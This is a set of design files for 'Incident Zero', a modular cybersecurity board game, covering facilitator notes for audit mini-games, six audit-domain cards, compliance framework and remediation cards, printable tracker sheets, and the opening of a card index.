Teaching point: Audits need business justification, not just technical standards
"What's the difference between a 'critical finding' and a 'risk we're accepting'?"
Teaching point: Risk management is nuanced; not all gaps are equally important
"How does this change how you think about the attacks in Incident Response?"
Use When: - Limited time (< 30 min session) - First exposure to audit concepts - Want to compare different infrastructure strategies - Non-competitive, educational focus
Learning Value: - Understand how audit domains work - See difference between good/bad designs - Low setup time
Use When: - Want to combine building + auditing - 30-40 minute session - Teams benefit from designing then being audited - Competitive element desired
Learning Value: - Teams make trade-off decisions - See consequences of choices reflected in audit - "This gap I chose to accept was exactly what the auditor found!"
Use When: - Advanced/experienced teams - Want deep critical thinking - Discussion-based learning preferred - Comfortable with argumentation/debate format
Learning Value: - Audit findings are interpretable - Context matters (startup vs. bank) - Security decisions involve trade-offs - Preparation for defending security to board/leadership
Setup: 3 min
Audit Startup Tech: 4 min
Audit Mid-Market: 4 min
Audit Enterprise: 4 min
Comparison & Discussion: 3 min
Debrief: 2 min
Total: 20 minutes
Perfect for: Intro to audit concepts
Setup: 3 min
Teams build networks (simplified): 10 min
Teams audit each other: 15 min
Score & announce winner: 3 min
Debrief: 4 min
Total: 35 minutes
Perfect for: Combined learning, competitive
Setup & brief: 2 min
SCENARIO 1:
- Presentation: 1 min
- Prep: 3 min
- Debate: 5 min
- Scoring: 1 min
- Subtotal: 10 min
SCENARIO 2: 10 min
SCENARIO 3: 10 min
Debrief: 3 min
Total: 30 minutes
Perfect for: Advanced critical thinking
Variation A (Pre-Built): 20 min
- Understand audit domains via 3 sample networks
Variation B (Random Gen): 25 min
- Build network, get audited
- See your choices reflected in audit findings
Variation C (Debate): 10 min
- Single debate scenario to reinforce learning
Debrief & Connection: 5 min
- "Now you understand how audits work"
- "In Incident Response, attackers will exploit these gaps"
Total: 60 minutes
Perfect for: Comprehensive audit education
After playing Audit Standalone, teams can transition to the Incident Response module:
Narrative Bridge:
"You just audited how well different organizations designed their security. Now let's see what happens when an attacker encounters those same networks. The gaps you found in the audit? Attackers will find them too.
Your audit findings were: - Startup Tech: HIGH RISK (no segmentation, no detection) - Mid-Market: MEDIUM RISK (strong foundation, legacy gap) - Enterprise: LOW RISK (defense-in-depth)
Now, if an attacker targets each of these networks, how will it go?"
Everything needed to play today is in this document: the three network descriptions, the 6-domain framework, the answer keys, the inline audit worksheet, and the three debate scenarios. Printed play aids (scoring reference card, audit worksheet, judge guide, scoring sheets): see print pack (coming).
| Variation | Duration | Complexity | Competition | Setup |
|---|---|---|---|---|
| A: Pre-Built | 15-25 min | Low | Low | Minimal |
| B: Random Gen | 25-35 min | Medium | Medium | Moderate |
| C: Debate | 20-30 min | High | High | Moderate |
After any Audit Standalone variation, teams should understand:
Key Teaching: "In Incident Response, auditors played the role of the security team. Attackers play the same role, but with opposite intent. They're looking for exactly what auditors find."
Incident Zero: Compliance Audit Standalone Mini-Games
Three variations of security assessment gameplay
Teach how audits find vulnerabilities that attackers will exploit
cards/audit-compliance/core-deck/audit-domain-cards.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Audit Domain Assessment Cards represent six critical security domains that an organization must have controls for. Each domain is assessed independently, with findings recorded on a standard audit report.
PASS/FAIL per domain (X/6) is the primary score. Stars are flavor, with this fixed mapping:
1-2★ = FAIL · 3★+ = PASS · "PARTIAL" counts as FAIL
Domain Score determines:
- Audit Grade (1-5 stars, flavor)
- PASS/FAIL status (primary — via the mapping above)
- Findings Severity (critical/major/minor)
- Modifiers for other modules (IR, DR get harder if audit failed — see the canonical table in docs/rules/module-audit-compliance.md)
Focus: How well is network divided into protected segments? Critical For: Preventing lateral movement Regulatory References: PCI-DSS (network segmentation), NIST (zero trust)
What's Assessed: - Is network flat (1 segment) or segmented (multiple segments)? - Are sensitive systems isolated (DMZ, database segment, admin segment)? - Are firewall rules enforced between segments? - Is network architecture documented? - Are VLANs/subnets properly configured?
Typical Findings: - Critical (1-2 star): Flat network, no segmentation, everything can talk to everything - Major (2-3 star): Basic segmentation exists, but enforcement is weak - Minor (3-4 star): Segmentation exists, few rule violations - Compliant (4-5 star): Strong segmentation, zero-trust architecture
Real-World Question: "If one system is compromised, how far can the attacker spread?" - Flat network: Entire organization immediately - 3-zone network: Blocked by firewalls - Zero-trust: Individual systems isolated
Audit Evidence: - Network diagram (shows segments) - Firewall rule documentation - Network ACL lists - Proof of implementation (switch configs) - Test results (can systems cross segments? No)
Compliance Standards: - PCI-DSS Requirement 1: Network segmentation for cardholder data - NIST CSF: PR.AC-5 (Network integrity protected via segmentation) - CIS Control 12: Network Infrastructure Management (v8)
Findings Template:
FINDING: Network segmentation inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: The network is [flat/minimally segmented], allowing [lateral movement/unauthorized access]
RECOMMENDATION: Implement [VLAN/firewall rules/zero-trust] to segment [database/admin/sensitive systems]
EFFORT: [1-5] weeks
COST: [Moderate/High/Very High]
Remediation Actions: - ✓ Implement network segmentation (ARCH-02, ARCH-03 in Network Building) - ✓ Deploy firewall with segmentation rules (SEC-08) - ✓ Implement zero-trust architecture (ARCH-03) - ✓ Test segmentation enforcement
Impact if Failed (1-2 stars): - T-04 (Lateral Movement) becomes trivial for attackers - Incident Response: -1 to NETWORK defenses (canonical modifier) - Disaster Recovery: -10 DR budget penalty (attacker spreads widely)
Focus: How are user identities managed and access controlled? Critical For: Preventing unauthorized access Regulatory References: HIPAA (access controls), GDPR (access management)
What's Assessed: - Is there centralized identity management (Domain Controller/Azure AD)? - Is multi-factor authentication (MFA) enabled for sensitive access? - Are access permissions based on least privilege? - Are access reviews performed (verify who has access)? - Are privileged accounts managed (admin accounts, service accounts)?
Typical Findings: - Critical (1-2 star): No centralized identity, weak passwords, no MFA - Major (2-3 star): Some identity management, MFA not universal - Minor (3-4 star): Good identity management, minor gaps - Compliant (4-5 star): Strong identity, MFA everywhere, privilege management
Real-World Question: "How easily can an attacker use stolen credentials?" - Weak: No MFA, can use stolen password immediately - Medium: MFA only for some systems - Strong: MFA everywhere, weak credentials are useless
Audit Evidence: - AD/directory configuration - MFA enrollment status - Access policy documentation - Privileged account audit (who has admin?) - Account review records (periodic access verification)
Compliance Standards: - PCI-DSS Requirement 8: User identification and authentication - HIPAA Rule 164.308(a)(4): Unique user identification - NIST CSF: PR.AC-1 (Physical & logical access controls)
Findings Template:
FINDING: Multi-factor authentication not universally enforced
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: MFA is [not implemented/optional] for [VPN/email/admin access]
RECOMMENDATION: Deploy [MFA solution] to [affected systems]
EFFORT: [2-4] weeks
COST: [Low/Moderate/High]
Remediation Actions: - ✓ Deploy MFA (D-07 in Hardening) - ✓ Implement password vault (D-12) - ✓ Credential Guard for privileged access (D-16) - ✓ Access reviews quarterly
Impact if Failed (1-2 stars): - T-03 (Compromised Credentials), T-06 (Mimikatz) become likely - Incident Response: -1 to CREDENTIAL_ABUSE defenses (canonical modifier) - Disaster Recovery: -15 DR budget penalty (attacker can restore themselves with stolen creds)
Focus: Can the organization detect and respond to attacks? Critical For: Finding breaches quickly Regulatory References: GDPR (breach detection), HIPAA (log monitoring)
What's Assessed: - Are logs being collected centrally (SIEM or similar)? - Is there 24/7 monitoring of critical systems? - Are alerts configured to detect suspicious activity? - Is there incident response plan documented? - Are incident responders trained?
Typical Findings: - Critical (1-2 star): No logging, no monitoring, no incident response plan - Major (2-3 star): Some logging, limited monitoring - Minor (3-4 star): Good logging, some gaps in alerting - Compliant (4-5 star): Comprehensive logging, active monitoring, trained team
Real-World Question: "How quickly will you detect an active attacker?" - Poor: Days/weeks (after data is already stolen) - Medium: Hours (after attacker has spread) - Strong: Minutes (catch attacker early)
Audit Evidence: - SIEM/logging configuration - Alert rules documentation - Incident response plan - Training records (who's trained?) - Incident history (how did you detect past incidents?)
Compliance Standards: - GDPR Article 33: Breach notification timing (72 hours) - HIPAA Rule 164.308(a)(6): Incident response procedures - NIST CSF: DE.AE-3 (Event detection processes)
Findings Template:
FINDING: Insufficient threat detection and monitoring
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [SIEM/monitoring] is [not deployed/inadequately configured]
RECOMMENDATION: Deploy [SIEM] with [alert rules] to detect [attack patterns]
EFFORT: [4-8] weeks
COST: [Moderate/High]
Remediation Actions: - ✓ Deploy SIEM (D-09, D-22) - ✓ Configure log centralization (D-05) - ✓ Create SIEM correlation rules (D-10) - ✓ Threat hunting program (D-13)
Impact if Failed (1-2 stars): - Breach detection is late (attacker has time to steal data) - Incident Response: -1 to Investigation rolls (canonical modifier; late detection) - Disaster Recovery: -10 DR budget penalty (dwell time longer; more data stolen)
Optional (v2.2): a 5-star rating in this domain grants +1 to Incident Response investigation rolls if IR is played later.
Focus: Can the organization recover from attacks/disasters? Critical For: Ransomware resilience Regulatory References: Most breach laws mention recovery
What's Assessed: - Is there a documented backup strategy (frequency, retention)? - Are backups tested regularly (restore actually works)? - Is backup storage off-site (geographically separated)? - Are backups immutable (cannot be deleted/encrypted)? - Is recovery time objective (RTO) documented for each system?
Typical Findings: - Critical (1-2 star): No backups or untested backups (may not restore) - Major (2-3 star): Backups exist but not properly tested - Minor (3-4 star): Backups exist and tested, gaps in immutability - Compliant (4-5 star): 3-2-1 strategy, tested, immutable, offsite
Real-World Question: "Can you recover from ransomware?" - Poor: No (backups are encrypted too) - Medium: Yes but slowly (days to recover) - Strong: Yes quickly (hours to recover, immutable backups)
Audit Evidence: - Backup schedule/documentation - Backup test results (prove restore works) - Off-site backup location documentation - Immutable backup configuration - Recovery time estimates
Compliance Standards: - Most breach laws assume backups exist (no recovery = massive damage) - HIPAA Rule 164.308(a)(7): Data backup procedures - NIST CSF: PR.IP-4 (Resilience practices documented)
Findings Template:
FINDING: Backup and recovery procedures inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: Backups are [not tested/not off-site/not immutable]
RECOMMENDATION: Implement [3-2-1 strategy] with [immutable storage]
EFFORT: [2-4] weeks
COST: [Moderate]
Remediation Actions: - ✓ Implement 3-2-1 backup strategy (D-19) - ✓ Test backups quarterly (prove restore works) - ✓ Immutable storage (WORM, cloud versioning) - ✓ Off-site backup location
Impact if Failed (1-2 stars): - Ransomware attacks cannot be recovered from - Disaster Recovery: -25 DR budget penalty (no recovery option; expensive rebuild) - Business interruption is long (days vs hours) - No IR effect (matters in Disaster Recovery)
Focus: How well are vendors and cloud services managed? Critical For: Managing supply chain risk Regulatory References: GDPR (processor accountability), PCI-DSS (vendor security)
What's Assessed: - Is there a vendor management program? - Are vendors required to meet security standards? - Are vendor assessments conducted (security questionnaires, audits)? - Are cloud configurations secured (IAM, encryption, monitoring)? - Is data residency managed (where is customer data stored)?
Typical Findings: - Critical (1-2 star): No vendor management, cloud misconfigured - Major (2-3 star): Basic vendor management, cloud gaps - Minor (3-4 star): Vendor management exists, minor gaps - Compliant (4-5 star): Strong vendor program, cloud security
Real-World Question: "Is your vendor secure?" - Poor: No idea (never asked them) - Medium: They said they're secure (took their word) - Strong: Assessed and monitored (ongoing verification)
Audit Evidence: - Vendor management policy - Vendor security questionnaires - Cloud configuration documentation - IAM policies for cloud access - Data residency mapping
Compliance Standards: - GDPR Article 28: Processor agreements (vendor security required) - PCI-DSS Requirement 12.8: Service provider agreements - NIST CSF: ID.SC (Supply Chain Risk Management)
Findings Template:
FINDING: Vendor and cloud security assessment inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [Vendor/Cloud] security is [not assessed/misconfigured]
RECOMMENDATION: Implement [vendor assessment process/cloud security hardening]
EFFORT: [3-6] weeks
COST: [Low/Moderate]
Remediation Actions: - ✓ Vendor management program (SLAs, security requirements) - ✓ Cloud security posture management (CSPM tools) - ✓ Cloud IAM hardening (least privilege) - ✓ Regular vendor assessments
Impact if Failed (1-2 stars): - SCENARIO-03 (Supply Chain Compromise) becomes likely in Disaster Recovery - Vendor breach affects your customers - Liability disputes (who's responsible?) - Incident Response: -1 to WEB_EXPLOIT defenses (canonical modifier) - Disaster Recovery: -20 DR budget penalty (cloud provider recovery needed)
Focus: How is security operationalized (day-to-day)? Critical For: Sustained security posture Regulatory References: Most frameworks mention continuous monitoring
What's Assessed: - Is there a dedicated security team (CISO, analysts)? - Are security meetings held regularly? - Is vulnerability scanning done regularly? - Are patches applied timely? - Is security training conducted?
Typical Findings: - Critical (1-2 star): No security team, no updates, no training - Major (2-3 star): Small security team, infrequent patching - Minor (3-4 star): Security team exists, good operations - Compliant (4-5 star): Mature security operations, continuous improvement
Real-World Question: "Is security a priority for the organization?" - Poor: No dedicated resources - Medium: Part-time effort - Strong: Dedicated team, empowered leadership
Audit Evidence: - Org chart (is CISO position filled?) - Security meeting minutes - Vulnerability scan reports - Patch management records - Training records
Compliance Standards: - Most frameworks require security leadership - NIST CSF: PR.IP-1 (Security policy established & communicated) - CIS Control 17: Incident Response Management (v8)
Findings Template:
FINDING: Security operations maturity inadequate
SEVERITY: [Critical/Major/Minor]
DESCRIPTION: [Security team/training/patching] is [insufficient]
RECOMMENDATION: [Hire/train/increase resources] for [security function]
EFFORT: [Ongoing]
COST: [Varies]
Remediation Actions: - ✓ Hire CISO (if missing) - ✓ Establish security team - ✓ Regular vulnerability scanning - ✓ Patch management program - ✓ Security awareness training
Impact if Failed (1-2 stars): - Security functions are reactive (not proactive) - Incident Response: -1 to Investigation rolls (canonical modifier) - Disaster Recovery: -5 DR budget penalty (forensic investigation slow) - Vulnerabilities accumulate (PT-10 Zero-Day risk increases)
| Domain | Focus | Critical Finding | Remediation Effort | Compliance Impact |
|---|---|---|---|---|
| DOMAIN-01 | Network Segmentation | Flat network | Moderate (2-4 wk) | Lateral movement prevented |
| DOMAIN-02 | Access Control | No MFA | Low (2-4 wk) | Credential attacks harder |
| DOMAIN-03 | Threat Detection | No SIEM | High (4-8 wk) | Breach detection enabled |
| DOMAIN-04 | Backup & DR | No backups | Moderate (2-4 wk) | Ransomware resilience |
| DOMAIN-05 | Vendor Risk | No assessment | Low (3-6 wk) | Supply chain risk managed |
| DOMAIN-06 | Security Ops | No security team | High (ongoing) | Sustained security posture |
AUDIT REPORT - [Organization Name]
Audit Date: [Date]
Domains Assessed: 6
Overall Score: 2/6 PASS (stars are flavor: 1-2* = FAIL, 3*+ = PASS)
DOMAIN SCORES:
1. Network Segmentation: ⭐⭐ (2 stars) - FAIL
2. Access Control: ⭐⭐⭐ (3 stars) - PASS
3. Threat Detection: ⭐ (1 star) - FAIL (CRITICAL)
4. Backup & DR: ⭐⭐ (2 stars) - FAIL
5. Vendor Risk: ⭐⭐ (2 stars) - FAIL
6. Security Ops: ⭐⭐⭐⭐ (4 stars) - PASS
CRITICAL FINDINGS (must fix immediately):
- No SIEM or threat monitoring
- Network is completely flat (no segmentation)
MAJOR FINDINGS (fix within 30 days):
- No backup strategy
- Vendor security not assessed
- MFA not implemented
MINOR FINDINGS (fix within 90 days):
- Security training curriculum needs update
RECOMMENDATIONS:
1. Deploy SIEM immediately (critical)
2. Implement network segmentation
3. Establish backup program
4. Implement MFA
5. Develop vendor management program
docs/rules/module-audit-compliance.md, v2.2)For each failed domain (FAIL = 1-2 stars): one -1 modifier.
| Failed Domain | IR Modifier |
|---|---|
| DOMAIN-01 Segmentation | -1 to NETWORK defenses |
| DOMAIN-02 Identity | -1 to CREDENTIAL_ABUSE defenses |
| DOMAIN-03 Detection | -1 to Investigation rolls |
| DOMAIN-04 Backup | None (matters in DR) |
| DOMAIN-05 Vendor/Cloud | -1 to WEB_EXPLOIT defenses |
| DOMAIN-06 Security Ops | -1 to Investigation rolls |
Example: if 3 domains fail, IR carries three separate -1 modifiers.
For each failed domain (FAIL = 1-2 stars): a penalty subtracted from the DR starting budget.
| Failed Domain | DR Budget Penalty |
|---|---|
| DOMAIN-01 Segmentation | -10 |
| DOMAIN-02 Identity | -15 |
| DOMAIN-03 Detection | -10 |
| DOMAIN-04 Backup | -25 |
| DOMAIN-05 Vendor/Cloud | -20 |
| DOMAIN-06 Security Ops | -5 |
Cap (v2.2): the total gap penalty applied to a subsequent module's budget is capped at -30.
Example (real budgets: DR starts at 50, IR at 100): if all 6 domains fail, the raw penalty is -85, capped at -30 — the team enters Disaster Recovery with 50 - 30 = 20 Budget.
Audit & Compliance Module: Audit Domain Assessment Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/audit-compliance/expansion-deck/compliance-frameworks.md
Version: 2.2 - Playtest Edition Last Updated: October 2025
Compliance Framework Cards extend the Audit & Compliance module with industry-specific and regulation-specific assessment frameworks beyond the generic 6-domain audit.
Organizations must often comply with specific regulatory frameworks. Each framework has slightly different focuses and requirements.
Relevance: US Federal government, critical infrastructure, government contractors Key Standard: NIST CSF (Cybersecurity Framework) 5 functions
Framework: NIST CSF Function: Identify (AM - Asset Management, RM - Risk Management) Focus: Knowing what systems/data you have and what risks they face
Assessment Criteria: - Asset inventory (what systems exist?) - Data classification (what data is sensitive?) - Risk assessment (what could go wrong?) - Threat intelligence (what are realistic threats?)
Scoring (1-5 stars): - ⭐ (1): No asset inventory, no risk assessment - ⭐⭐ (2): Partial inventory, informal risk assessment - ⭐⭐⭐ (3): Complete inventory, documented risk assessment - ⭐⭐⭐⭐ (4): Inventory regularly updated, risk assessment reviewed annually - ⭐⭐⭐⭐⭐ (5): Real-time asset visibility, continuous risk assessment
Typical Findings: - Unknown systems (shadow IT) - Unclassified data (don't know what's sensitive) - Missing risk assessment - Risk assessment not updated
Remediation: - Discovery tools (find all systems) - Data classification policy - Annual risk assessment - Asset management system
Framework: NIST CSF Function: Protect (PR.AC - Identity Management & Access Control, PR.AT - Awareness & Training, PR.DS - Data Security, PR.IP - Information Protection Processes, PR.MA - Maintenance, PR.PT - Protective Technology) Focus: Building security controls to prevent/slow attacks
Assessment Criteria: - Access controls (only authorized users) - Employee training (security awareness) - Data protection (encryption, classification) - Information protection (DLP, data loss prevention) - Business continuity (backup, disaster recovery)
Scoring (1-5 stars): - ⭐ (1): No controls - ⭐⭐ (2): Basic controls (passwords) - ⭐⭐⭐ (3): Good controls (MFA, encryption) - ⭐⭐⭐⭐ (4): Strong controls (defense-in-depth) - ⭐⭐⭐⭐⭐ (5): Excellent controls (comprehensive, tested)
Typical Findings: - Weak authentication (no MFA) - Poor training (phishing success rate >10%) - Unencrypted data - No backup strategy - Defense gaps
Remediation: - MFA deployment - Security training program - Encryption implementation - Backup/DR strategy - Penetration testing
Framework: NIST CSF Function: Detect (AE - Anomalies & Events, CM - Continuous Monitoring) Focus: Detecting attacks as they happen
Assessment Criteria: - Log monitoring (are suspicious activities logged?) - Anomaly detection (is suspicious behavior caught?) - Continuous monitoring (24/7 surveillance) - Alert procedures (who responds to alerts?) - Threat intelligence integration (using threat data)
Scoring (1-5 stars): - ⭐ (1): No logging, no monitoring - ⭐⭐ (2): Logging exists, limited monitoring - ⭐⭐⭐ (3): SIEM deployed, some alerts - ⭐⭐⭐⭐ (4): SIEM with good rules, 24/7 monitoring - ⭐⭐⭐⭐⭐ (5): Mature SOC, threat intelligence integrated
Typical Findings: - No SIEM deployed - Alerts not reviewed - No 24/7 monitoring - Response time too slow - Threat intel not integrated
Remediation: - SIEM deployment - Alert rule tuning - SOC staffing (24/7 coverage) - Response procedures - Threat intel integration
Framework: NIST CSF Function: Respond (RS.RP - Response Planning, RS.CO - Communications, RS.AN - Analysis, RS.MI - Mitigation, RS.IM - Improvements) Focus: Responding to breaches/attacks
Assessment Criteria: - Incident response plan (documented procedures) - Response team (trained, staffed) - Communication plan (who gets told when) - Investigation procedures (forensics) - Post-incident review (lessons learned)
Scoring (1-5 stars): - ⭐ (1): No incident response plan - ⭐⭐ (2): Plan exists, not tested - ⭐⭐⭐ (3): Plan exists, annual testing - ⭐⭐⭐⭐ (4): Plan regularly tested, team trained - ⭐⭐⭐⭐⭐ (5): Mature response, regular exercises, continuous improvement
Typical Findings: - No incident response plan - Response team not trained - No communication plan - Investigation procedures unclear - No post-incident reviews
Remediation: - Incident response plan development - Team training - Communication procedures - Tabletop exercises - Post-incident review process
Framework: NIST CSF Function: Recover (RC.RP - Recovery Planning, RC.IM - Improvements, RC.CO - Communications) Focus: Recovering from breaches and improving for next time
Assessment Criteria: - Recovery plan (how to restore systems) - Recovery time objectives (RTO - how fast?) - Recovery point objectives (RPO - how much data loss?) - Backup verification (can you actually restore?) - Lessons learned process (improve after incident)
Scoring (1-5 stars): - ⭐ (1): No recovery plan, no backups - ⭐⭐ (2): Backup exists, recovery not tested - ⭐⭐⭐ (3): Recovery plan exists, tested annually - ⭐⭐⭐⭐ (4): Recovery plan regularly tested, RPO/RTO defined - ⭐⭐⭐⭐⭐ (5): Mature recovery, tested regularly, continuous improvement
Typical Findings: - No recovery plan - Backups untested (may not restore) - RTO/RPO not defined - Recovery team not trained - No lessons learned process
Remediation: - Recovery plan development - Backup testing (quarterly) - RTO/RPO definition - Recovery team training - Lessons learned process
Relevance: General US/Canada, healthcare, financial, government Key Standard: CIS Controls (18 prioritized security controls)
Focus: Basic security practices (asset management, access control, data protection, secure configuration)
Assessment Criteria: - Asset management (know what you have) - Access control (least privilege) - Data protection (encryption) - Secure configuration (harden systems) - Detection tools (SIEM, antivirus) - Training (security awareness)
Focus: Advanced controls (incident response, supply chain, defense tools)
Assessment Criteria: - Incident response plan - Supply chain risk - Vulnerability management - Application security - Remote services security - Testing & monitoring - Network segmentation
Focus: Operational controls (reporting, awareness, training, testing)
Assessment Criteria: - Security awareness training - Incident reporting - Third-party risk management - Penetration testing - Secure development practices
Relevance: Any organization handling payment cards Key Standard: PCI-DSS (Payment Card Industry Data Security Standard)
Focus: Network and system security for cardholder data
Assessment Criteria: - Firewall configuration - No default credentials - Cardholder data protection - Vulnerability scanning
Focus: Access control and operational procedures
Assessment Criteria: - Antivirus/malware protection - Secure system updates - Access control & authentication - Audit trails & logging
Focus: Testing, monitoring, and compliance management
Assessment Criteria: - Security testing (penetration testing, vulnerability scanning) - Monthly scanning - Annual penetration testing - Security policies - Training - Incident response procedures
Remediation Cards represent specific actions to address compliance findings. These can be used after an audit to remediate identified gaps.
Budget note (v2.2): these cards are the only place the Audit module's starting Budget (100, per core rules) is spent — the assessment itself costs nothing.
Cost: 5 Budget Timeline: 2-4 weeks Difficulty: Low-Medium
What it does: - Deploy multi-factor authentication for all user access - Implement MFA for VPN, remote access, email, admin access - Select authentication method (authenticator app, hardware token, SMS)
Prerequisites: - Identity management system (Domain Controller, Azure AD) - User device (phone or security key) - Application/system support for MFA
Impact: - Reduces DOMAIN-02 (Access Control) findings - Makes credential attacks (T-03, T-06) harder - Improves Incident Response and Disaster Recovery modifiers
Cost: 15 Budget Timeline: 4-8 weeks Difficulty: Medium
What it does: - Deploy Security Information & Event Management (SIEM) - Configure log collection from all systems - Create alert rules for suspicious activity - Implement 24/7 monitoring
Prerequisites: - Centralized logging infrastructure - SIEM software/service (Splunk, ELK, QRadar, Azure Sentinel) - Security personnel to manage SIEM
Impact: - Reduces DOMAIN-03 (Threat Detection) findings - Enables early breach detection - Improves Incident Response investigation - Provides audit trail for compliance
Cost: 12 Budget Timeline: 4-6 weeks Difficulty: Medium-High
What it does: - Divide network into security zones (DMZ, internal, admin) - Deploy firewalls between zones - Configure firewall rules for inter-zone traffic - Implement VLANs and network isolation
Prerequisites: - Network switches/routers capable of VLAN support - Firewall(s) for inter-zone traffic - Network diagram and access requirements
Impact: - Reduces DOMAIN-01 (Network Segmentation) findings - Prevents lateral movement (T-04 becomes harder) - Improves Disaster Recovery (limits blast radius) - Foundational for zero-trust architecture
Cost: 10 Budget Timeline: 2-4 weeks Difficulty: Low-Medium
What it does: - Implement 3-2-1 backup strategy (3 copies, 2 media, 1 offsite) - Configure automated backups - Test backup restoration (quarterly) - Document recovery procedures
Prerequisites: - Backup software/service - Off-site storage location - Testing schedule
Impact: - Reduces DOMAIN-04 (Backup & DR) findings - Enables ransomware recovery - Improves Disaster Recovery (reduces costs) - Supports compliance requirements
Cost: 3 Budget Timeline: 1-2 weeks (ongoing) Difficulty: Low
What it does: - Develop security awareness training curriculum - Conduct initial training for all employees - Implement phishing simulations - Quarterly refresher training
Prerequisites: - Training development (internal or vendor) - Management buy-in (release time for employees)
Impact: - Reduces DOMAIN-06 (Security Ops) findings - Reduces phishing success rate - Improves overall security culture - Compliance requirement (most frameworks)
Cost: 5 Budget Timeline: 2-4 weeks Difficulty: Low-Medium
What it does: - Develop vendor security questionnaire - Send questionnaires to key vendors - Review vendor security controls - Document vendor risk assessment - Establish SLAs with security requirements
Prerequisites: - Vendor list and criticality assessment - Security questionnaire template - Document review process
Impact: - Reduces DOMAIN-05 (Third-Party Risk) findings - Identifies supply chain risks - Prevents SCENARIO-03 (Supply Chain Compromise) - Compliance requirement (GDPR, etc.)
Cost: 8 Budget Timeline: 3-4 weeks Difficulty: Medium
What it does: - Deploy vulnerability scanning tools - Establish patching procedures - Configure patch management automation - Document vulnerability remediation process
Prerequisites: - Vulnerability scanner (Nessus, Qualys, OpenVAS) - Patch management tools or procedures - Prioritization process (critical vs. non-critical)
Impact: - Reduces multiple audit findings - Prevents PT-05 (Privilege Escalation via unpatched kernel) - Improves overall security posture
Cost: 12 Budget Timeline: 4-6 weeks (plus ongoing) Difficulty: Medium-High
What it does: - Develop incident response plan (procedures, contacts, escalation) - Establish incident response team - Conduct tabletop exercises - Implement communication procedures
Prerequisites: - Team designation (CISO, security analysts, IT, legal, PR) - Plan documentation - Training and exercises
Impact: - Reduces DOMAIN-03 (Threat Detection) and DOMAIN-06 (Security Ops) findings - Enables faster response to Incident Response module - Improves Disaster Recovery effectiveness - Compliance requirement (nearly universal)
Audit & Compliance Module: Compliance Frameworks & Remediation (Expansion) Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/print-templates/tracker-sheets.md
Version: 2.2 - Playtest Edition
Print on plain A4. One Universal Sheet per table, plus the module sheet for the module you're playing. Tip: laminate and use a dry-erase marker, or move a coin/token along the tracks.
Cross off as each turn ends. Circle your turn limit before starting.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
[ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ] [ ]
Start at your module's budget (Network Building 40-60 · Disaster Recovery 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150). Tick down in 5s.
150 145 140 135 130 125 120 115 110 105 100 95 90 85 80 75
70 65 60 55 50 45 40 35 30 25 20 15 10 5 0
100 95 90 85 80 75 70 65 60 55 50 45 40 35 30 25 20 15 10 5 0
0 1 2 3 4 5
[ ] [ ] [ ] [ ] [ ] [ ] Penalty at start of turn: -5 Budget each
Advance each meter per card effects. Victory thresholds marked ▲.
ATTRIBUTION 0 10 20 30 40 50 60 70 80 90▲ 100
TIMELINE 0 10 20 30 40 50 60 70 80▲ 90 100
ATTACK CHAIN 0 10 20 30 40 50 60 70 80▲ 90 100
CHAIN OF CUSTODY 0 10 20 30 40 50 60 70▲ 80 90 100
Victory check (end of game): - V1 Full Attribution: Attribution ≥90 AND Timeline ≥80 - V2 Solid Case: Timeline ≥80 AND Attack Chain ≥80 AND Chain of Custody ≥70 - V3 Partial Findings: any two meters ≥70
Investigation in flight: ____ (results arrive Turn _) Evidence collected (✓ = Analyzed, one Analyze per card):
| Evidence card | Documented? (+5% CoC) | Analyzed? |
|---|---|---|
INVESTIGATION 0 10 20 30 40 50 60 70 80 90 100
REMEDIATION 0 10 20 30 40 50 60 70 80 90 100
COMMUNICATION 0 10 20 30 40 50 60 70 80 90 100
| Stakeholder | 100 | 80 | 60 | 40 | 20 (critical) | 0 (LOSS) |
|---|---|---|---|---|---|---|
| Customers | ||||||
| Employees | ||||||
| Regulators | ||||||
| Board / Investors | ||||||
| Media / Public |
| Turn | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |
|---|---|---|---|---|---|---|---|---|
| Scheduled event | ||||||||
| Deadline | Customers notified (recommended) | Regulator penalties begin | GDPR 72h — regulators notified |
Multi-turn action in flight: ____ (completes Turn _)
| # | Domain | Stars (1-5) | PASS (3★+) / FAIL (1-2★) | Key gap found |
|---|---|---|---|---|
| 1 | Network Segmentation | |||
| 2 | Identity & Access | |||
| 3 | Detection & Monitoring | |||
| 4 | Backup & Recovery | |||
| 5 | Cloud Security | |||
| 6 | Security Operations |
Result: ___ / 6 PASS — Gap penalties for follow-on modules: see module rules (total capped at -30).
| Category | Points | Notes |
|---|---|---|
| Requirements met | per requirement card | |
| Security coverage | per rules scoring table | |
| Capability coverage | per rules scoring table | |
| Budget management | per rules scoring table | |
| TOTAL |
Components placed:
| Component | Cost | Capacity used / total |
|---|---|---|
Budget remaining: ___ / starting ___
cards/CARD_REFERENCE.md
Version 2.2 - Playtest Edition
Complete index of all cards across all six modules. This index is generated from the card files themselves — the card files under each module folder are the canonical source of truth. If this index ever disagrees with a card file, the card file wins.
Total: 247 cards across 6 modules (the 24-card shared Defense deck is counted once).
Module total: 63 cards (12 core threats + 24 shared defenses + 8 expansion threats + 19 expansion defenses).
| Deck | File | Card IDs | Count | Description |
|---|---|---|---|---|
| Core Threats | threat-defense-cards.md | T-01 – T-12 | 12 | Attack chain steps for the Threat Orchestrator, organized by kill chain phase |
| Core Defenses (shared) | threat-defense-cards.md | D-01 – D-24 | 24 | Shared with Hardening — see Shared Defense Deck |
| Expansion Threats | advanced-threats.md | T-13 – T-20 | 8 | Supply chain, insider, IoT, cloud, DNS tunneling, and physical attacks |
| Expansion Defenses | advanced-defenses.md | D-25 – D-43 | 19 | Whitelisting, behavioral analytics, container/cloud security, playbooks, backup/DR |
| Card ID | Title | Step | Vector |
|---|---|---|---|
| T-01 | Phishing Campaign | INITIAL COMPROMISE | SOCIAL ENGINEERING |
